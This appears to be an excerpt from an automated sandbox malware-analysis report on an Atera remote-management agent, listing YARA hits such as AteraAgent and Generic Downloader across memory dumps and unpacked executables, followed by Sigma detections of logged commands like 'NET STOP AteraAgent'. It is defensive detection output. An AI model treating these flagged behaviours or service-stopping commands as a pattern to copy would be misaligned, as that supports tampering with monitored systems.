00000024.00000002.2220576029.00000247F9AB4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2393257978.000001A572009000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002C.00000002.2453620644.000001A120B90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000014.00000002.2036704581.0000028A5538E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.0000025100869000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000000.2502915030.0000011CB23F2000.00000002.00000001.01000000.0000002B.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000014.00000002.2037499219.0000028A55CB3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000021.00000002.2999483708.0000023071BC5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A5003A8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000021.00000000.2113797571.0000023071932000.00000002.00000001.01000000.0000001A.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.2947253751.0000021F24E28000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000039.00000002.2574946100.000002A332E21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002F.00000002.2450784251.0000028A1918F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000016.00000002.2061211828.0000020593315000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.3061122675.0000011CCB680000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2941530850.000000127993F000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000004.00000002.1766749834.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2369172218.000001C2EAEB6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000021.00000002.2999483708.0000023071B80000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.00000256806FE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000000.2473112434.0000021F24C42000.00000002.00000001.01000000.0000002A.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2368827781.000001C2EAC40000.00000004.00000020.00040000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2552937808.000001F163497000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.000002510044C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000038.00000002.2774511491.00000175695DE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1844841948.0000021600166000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.2960467176.0000021F25452000.00000002.00000001.01000000.0000003E.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2232287306.00007FFDF1019000.00000004.00000001.01000000.0000001C.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1846105414.00000216792C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A5007A7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002F.00000002.2450784251.0000028A191F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001D.00000003.2088931639.00000199E5330000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2748747455.000002517956F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2794634831.0000019F9BEC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2369172218.000001C2EAE2A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2794634831.0000019F9C147000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000014.00000002.2037499219.0000028A55CC3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000016.00000002.2062023214.0000020593BA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001D.00000002.2153178803.00000199E5310000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2960570710.0000011CB2862000.00000002.00000001.01000000.0000003F.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2748747455.00000251795E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2660826367.000000E60D6F5000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000038.00000003.2773266363.0000017568C5B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A500368000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.2947253751.0000021F24DE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000003D.00000002.2638576747.0000000004960000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000021.00000002.2999483708.0000023071C0F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000016.00000002.2062023214.0000020593C23000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.00000256806C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2516150200.000001F14ADE4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.0000025680298000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2963836971.0000011CB33C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2385596719.000001A570E00000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2215218351.00000247F7939000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2291524671.00000150D7A7A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2748747455.0000025179568000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1850383596.00007FFD9B6C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2215218351.00000247F797F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2371335324.000001C2EB000000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2397219667.000001A57232D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2791521532.0000019F9BDA0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2397219667.000001A572300000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1848517334.000002167B8ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.2941515088.0000003732901000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000016.00000002.2061211828.0000020593290000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2393257978.000001A571FA7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2761360886.000002517A7B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2508147012.000001F14A345000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.3071172900.0000011CCB95B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2695271047.00000256F1EB7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2963836971.0000011CB3460000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.00000251006C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1846105414.0000021679304000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2516150200.000001F14AE9C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000039.00000002.2574440622.000002A3327B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2770892227.000002517AB85000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2397219667.000001A57236D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.3065551701.0000011CCB6F4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A5003BC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000004.00000002.1766749834.0000000004B84000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2385596719.000001A570E08000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000014.00000002.2037499219.0000028A55C41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2369172218.000001C2EAE1E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.0000025680426000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2688813637.00000256F0450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2281891177.00000150BEA56000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.3208734070.0000021F3DDF0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.0000025680287000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1844841948.000002160008C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A50046A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2785759950.0000019F9B69B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2508147012.000001F14A2C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000039.00000002.2568740282.000002A3325A2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.2962491449.0000021F25809000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2283587990.00000150BF492000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000039.00000002.2568740282.000002A33256C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2963836971.0000011CB3357000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2555247568.000001F163524000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2748747455.000002517959C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1846105414.0000021679351000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2291367988.00000150D7A64000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002F.00000002.2450684383.0000028A19130000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.0000025100001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2696035678.00000256F20DD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2948560613.0000011CB25D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000028.00000002.2547834924.000001F163320000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2963836971.0000011CB2E41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.2959271020.0000021F24FC2000.00000002.00000001.01000000.0000003C.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002A.00000002.2455544706.000001F751A7B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2214664032.00000247F7830000.00000004.00000020.00040000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.0000025100794000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000014.00000000.2004500560.0000028A55182000.00000002.00000001.01000000.00000016.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2393257978.000001A571F76000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001F.00000002.2151626774.000002249A8E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2950479205.0000011CB26E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2792659060.0000019F9BDE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000036.00000002.2950479205.0000011CB269D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000021.00000002.2945403740.0000023000001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2748747455.00000251795BC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000000.2421755187.0000019F9B462000.00000002.00000001.01000000.00000027.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2373005329.000001C2EBD10000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2695385243.00000256F20B5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000C.00000002.1844841948.000002160017C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000000E.00000002.2356972366.000001A5002C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000002D.00000002.2785759950.0000019F9B652000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2283587990.00000150BF3CD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2369172218.000001C2EADE9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001D.00000002.2152982733.00000199E5103000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2770892227.000002517AB3A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000026.00000002.2352910675.000001C2805B3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000031.00000002.2962491449.0000021F25671000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2281891177.00000150BEA95000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
0000001B.00000002.2283587990.00000150BF524000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: rundll32.exe PID: 344	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: rundll32.exe PID: 3320	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: rundll32.exe PID: 5064	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AteraAgent.exe PID: 2588	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AteraAgent.exe PID: 5768	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: rundll32.exe PID: 7320	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageAgentInformation.exe PID: 7664	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageAgentInformation.exe PID: 7788	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AteraAgent.exe PID: 7836	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageAgentInformation.exe PID: 8004	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: cmd.exe PID: 8156	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: cscript.exe PID: 7268	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageSTRemote.exe PID: 1524	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageMonitoring.exe PID: 7556	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageMonitoring.exe PID: 2128	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageAgentInformation.exe PID: 7128	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: cmd.exe PID: 4336	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: cscript.exe PID: 3520	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageUpgradeAgent.exe PID: 7756	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageUpgradeAgent.exe PID: 7956	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageTicketing.exe PID: 2848	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageMonitoring.exe PID: 2252	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageProgramManagement.exe PID: 3664	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: msiexec.exe PID: 7272	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: AgentPackageHeartbeat.exe PID: 1984	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: rundll32.exe PID: 7576	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Process Memory Space: rundll32.exe PID: 2992	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
Click to see the 356 entries

Unpacked PEs

Source	Rule	Description	Author
49.0.AgentPackageTicketing.exe.21f24c40000.0.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
57.2.AgentPackageHeartbeat.exe.2a3326a0000.1.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
12.0.AteraAgent.exe.21679140000.0.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
54.0.AgentPackageProgramManagement.exe.11cb23f0000.0.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
45.0.AgentPackageUpgradeAgent.exe.19f9b460000.0.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
54.2.AgentPackageProgramManagement.exe.11cb2860000.2.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
20.2.AgentPackageAgentInformation.exe.28a55610000.1.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
49.2.AgentPackageTicketing.exe.21f24fc0000.1.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
49.2.AgentPackageTicketing.exe.21f24fc0000.1.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
36.0.AgentPackageMonitoring.exe.247f7740000.0.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
24.2.AteraAgent.exe.251005e55a8.2.raw.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
36.2.AgentPackageMonitoring.exe.247f80b0000.1.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
49.2.AgentPackageTicketing.exe.21f25450000.2.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
33.0.AgentPackageSTRemote.exe.23071930000.0.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
24.2.AteraAgent.exe.25100607280.1.raw.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
24.2.AteraAgent.exe.2510073d310.0.raw.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
20.0.AgentPackageAgentInformation.exe.28a55180000.0.unpack	JoeSecurity_AteraAgent	Yara detected AteraAgent	Joe Security
20.0.AgentPackageAgentInformation.exe.28a55180000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
54.2.AgentPackageProgramManagement.exe.11ccbde0000.5.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Click to see the 14 entries

Sigma Signatures

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8156, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ProcessId: 7268, ProcessName: cscript.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 6D26F14034A16EC2E7A017FE2C233455 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6744, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 2640, ProcessName: net.exe

Sigma detected: Stop Windows Service Via Net.EXE

Source: Process started

